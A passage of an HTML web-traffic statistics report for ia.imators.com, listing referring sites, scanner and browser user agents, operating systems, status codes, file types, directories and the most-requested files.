href="https://ia.imators.com/">https://ia.imators.com/</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://www.i-conn.nl//wp-login.php">https://www.i-conn.nl//wp-login.php</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://ia-imaging.com//blog//wp-login.php">https://ia-imaging.com//blog//wp-login.php</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="www.google.comhttps://t.me/optimasprimetools">www.google.comhttps://t.me/optimasprimetools</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="http://www.ia.imators.com/cgi-bin">http://www.ia.imators.com/cgi-bin</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://www.ia.imators.com/cgi-bin/">https://www.ia.imators.com/cgi-bin/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="http://ia.imators.com/favicon.ico">http://ia.imators.com/favicon.ico</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">130</td><td class="xl">http://www.ia.imators.com/</td></tr> <tr><td class="R">53</td><td class="xl">http://ia.imators.com/</td></tr> <tr><td class="R">24</td><td class="xl">https://www.ia.imators.com/</td></tr> <tr><td class="R">12</td><td class="xl">https://www.google.com/</td></tr> <tr><td class="R">4</td><td class="xl">https://ia.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://webdisk.birkenheaddrill.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.google.fr/</td></tr> <tr><td class="R">1</td><td class="xl">https://158.193.145.151/</td></tr> <tr><td class="R">1</td><td class="xl">http://p7g6av7v.hongch.cn/</td></tr> <tr><td class="R">1</td><td class="xl">http://www.kaylanicoledigitalmarketing.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.gestionpl.ca/</td></tr> <tr><td class="R">1</td><td class="xl">https://27.6.173.252/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.27.248.198/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.521qquu58.xyz/</td></tr> <tr><td class="R">1</td><td class="xl">http://uwcuapimanagement.configuration.azure-api.net/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.i-conn.nl/</td></tr> <tr><td class="R">1</td><td class="xl">https://ia-imaging.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.google.ca/</td></tr> <tr><td class="R">1</td><td class="xl">https://clatsopcomputersolutions.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.blog.davideramirez.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://194.87.217.15/</td></tr> <tr><td class="R">1</td><td class="xl">https://mail.mgbacgiang3s.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://parkerjconstruction.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.24.179.113/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.wjui.net/</td></tr> <tr><td class="R">1</td><td class="xl">http://156.237.46.172/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">77</td><td class="P">77</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">48</td><td class="P">48</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td></tr> <tr><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com</td></tr> <tr><td class="R">62</td><td class="P">42</td><td class="xl">Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)</td></tr> <tr><td class="R">37</td><td class="P">37</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36</td></tr> <tr><td class="R">36</td><td class="P">36</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36</td></tr> <tr><td class="R">32</td><td class="P">32</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">30</td><td class="P">30</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43</td></tr> <tr><td class="R">28</td><td class="P">28</td><td class="xl">Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)</td></tr> <tr><td class="R">30</td><td class="P">26</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">25</td><td class="P">25</td><td class="xl">Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36</td></tr> <tr><td class="R">22</td><td class="P">22</td><td class="xl">Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0</td></tr> <tr><td class="R">21</td><td class="P">21</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">17</td><td class="P">17</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">16</td><td class="P">16</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">14</td><td class="P">14</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">12</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">12</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">12</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity</td></tr> <tr><td class="R">47</td><td class="P">10</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">16</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.4a) Gecko/20030401</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 zgrab/0.x</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 (scanner.ducks.party)</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36</td></tr> <tr><td class="R">30</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Mobile Safari/537.36</td></tr> <tr><td class="R">22</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36</td></tr> <tr><td class="R">14</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0</td></tr> <tr><td class="R">18</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">curl/7.61.1</td></tr> <tr><td class="R">520</td><td class="P">221</td><td class="xl">[not listed: 206 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">756</td><td class="P">483</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">704</td><td class="P">453</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">18</td><td class="P">18</td><td class="xl"> Safari/535</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">20</td><td class="P">7</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">3</td><td class="xl"> Safari/605</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">2</td><td class="xl"> Safari/534</td></tr> <tr><td class="N">2</td><td class="R">307</td><td class="P">238</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">84</td><td class="P">71</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">28</td><td class="P">24</td><td class="xl"> Firefox/120</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">8</td><td class="P">8</td><td class="xl"> Firefox/122</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">8</td><td class="P">8</td><td class="xl"> Firefox/139</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Firefox/137</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Firefox/126</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Firefox/136</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> Firefox/130</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> Firefox/134</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/62</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/83</td></tr> <tr><td class="N">4</td><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">43</td><td class="P">43</td><td class="xl"> Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains</td></tr> <tr><td class="N">5</td><td class="R">61</td><td class="P">41</td><td class="xl">Mozilla</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">17</td><td class="P">12</td><td class="xl"> Mozilla/1</td></tr> <tr><td class="N">6</td><td class="R">30</td><td class="P">26</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">30</td><td class="P">26</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">7</td><td class="R">10</td><td class="P">10</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https:</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">10</td><td class="P">10</td><td class="xl"> Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex</td></tr> <tr><td class="N">8</td><td class="R">10</td><td class="P">10</td><td class="xl">curl</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">10</td><td class="P">10</td><td class="xl"> curl/7</td></tr> <tr><td class="N">9</td><td class="R">18</td><td class="P">6</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">18</td><td class="P">6</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N">10</td><td class="R">4</td><td class="P">4</td><td class="xl">WanScannerBot</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> WanScannerBot/1</td></tr> <tr><td class="N">11</td><td class="R">5</td><td class="P">3</td><td class="xl">python-requests</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">3</td><td class="xl"> python-requests/2</td></tr> <tr><td class="N">12</td><td class="R">5</td><td class="P">3</td><td class="xl">MSIE</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> MSIE/7</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">1</td><td class="xl"> MSIE/9</td></tr> <tr><td class="N">13</td><td class="R">4</td><td class="P">1</td><td class="xl">googlebot</td></tr> <tr><td class="N">14</td><td class="R">1</td><td class="P">1</td><td class="xl">BlackBerry8320</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> BlackBerry8320/4</td></tr> <tr><td class="N"> </td><td class="R">30</td><td class="P">0</td><td class="xl">[not listed: 9 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">474</td><td class="P">356</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">454</td><td class="P">296</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">392</td><td class="P">272</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">55</td><td class="P">22</td><td class="xl"> Unknown Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Windows 2000</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> Windows XP</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">0</td><td class="xl"> Windows CE</td></tr> <tr><td class="N">3</td><td class="R">245</td><td class="P">157</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">244</td><td class="P">157</td><td class="xl"> Linux</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">0</td><td class="xl"> Other Unix</td></tr> <tr><td class="N">4</td><td class="R">194</td><td class="P">130</td><td class="xl">Macintosh</td></tr> <tr><td class="N">5</td><td class="R">1</td><td class="P">1</td><td class="xl">Symbian OS</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">1475</td><td class="xl">200 OK</td></tr> <tr><td class="R">2</td><td class="xl">301 Document moved permanently</td></tr> <tr><td class="R">5</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">166</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">5248</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">24</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">64</td><td class="b"> 0.32%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">872</td><td class="b">29.03%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">514</td><td class="b">54.85%</td></tr> <tr><td class="x"> 10kB-100kB</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x">100kB- 1MB</td><td class="R">1</td><td class="b">15.81%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">1046</td><td class="b">49.54%</td><td class="xl">[directories]</td></tr> <tr><td class="R">259</td><td class="b">25.18%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">8</td><td class="b">19.46%</td><td class="xl">.php [PHP]</td></tr> <tr><td class="R">52</td><td class="b"> 4.03%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">41</td><td class="b"> 0.98%</td><td class="xl">.svg</td></tr> <tr><td class="R">1</td><td class="b"> 0.47%</td><td class="xl">.cgi [CGI scripts]</td></tr> <tr><td class="R">68</td><td class="b"> 0.34%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">1026</td><td class="b">67.91%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">352</td><td class="b">30.18%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">96</td><td class="b"> 1.44%</td><td class="xl">/.well-known/</td></tr> <tr><td class="R">1</td><td class="b"> 0.47%</td><td class="xl">/cgi-sys/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">1018</td><td class="b">48.45%</td><td class="D">Dec/ 5/25 12:53 AM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">83</td><td class="b"> 3.48%</td><td class="D">Sep/ 5/25 12:14 PM</td><td class="xl"> <a href="/?192.42.116.194">/?192.42.116.194</a></td></tr> <tr class="sub level2"><td class="R">28</td><td class="b"> 1.90%</td><td class="D">Jun/27/24 12:00 AM</td><td class="xl"> <a href="/?195.211.77.140">/?195.211.77.140</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 1.51%</td><td class="D">Sep/15/24 3:19 PM</td><td class="xl"> <a href="/?198.235.24.138">/?198.235.24.138</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 1.39%</td><td class="D">Oct/27/25 2:12 PM</td><td class="xl"> <a href="/?147.93.158.41">/?147.93.158.41</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 0.99%</td><td class="D">Mar/ 1/25 3:30 PM</td><td class="xl"> <a href="/?104.166.80.124">/?104.166.80.124</a></td></tr> <tr class="sub level2"><td class="R">23</td><td class="b"> 1.16%</td><td class="D">Feb/28/25 11:54 PM</td><td class="xl"> <a href="/?45.148.10.172">/?45.148.10.172</a></td></tr> <tr class="sub level2"><td class="R">17</td><td class="b"> 0.50%</td><td class="D">Dec/ 4/25 1:02 PM</td><td class="xl"> <a href="/?109.196.75.89">/?109.196.75.89</a></td></tr> <tr class="sub level2"><td class="R">13</td><td class="b"> 0.45%</td><td class="D">Nov/16/25 3:13 AM</td><td class="xl"> <a href="/?rest_route=/wp/v2/users/">/?rest_route=/wp/v2/users/</a></td></tr> <tr class="sub level2"><td class="R">12</td><td class="b"> 0.70%</td><td class="D">Jul/26/24 5:12 AM</td><td class="xl"> <a href="/?199.45.154.72">/?199.45.154.72</a></td></tr> <tr><td class="R">136</td><td class="b">22.47%</td><td class="D">Oct/26/25 4:52 AM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">123</td><td class="b"> 2.71%</td><td class="D">Oct/28/25 9:46 PM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">52</td><td class="b"> 4.03%</td><td class="D">Oct/26/25 4:52 AM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">37</td><td class="b"> 0.89%</td><td class="D">Sep/16/25 6:20 AM</td><td class="xl">/_autoindex/assets/icons/folder-fill.svg</td></tr> <tr><td class="R">109</td><td class="b">21.45%</td><td class="D">Nov/16/25 3:13 AM</td><td 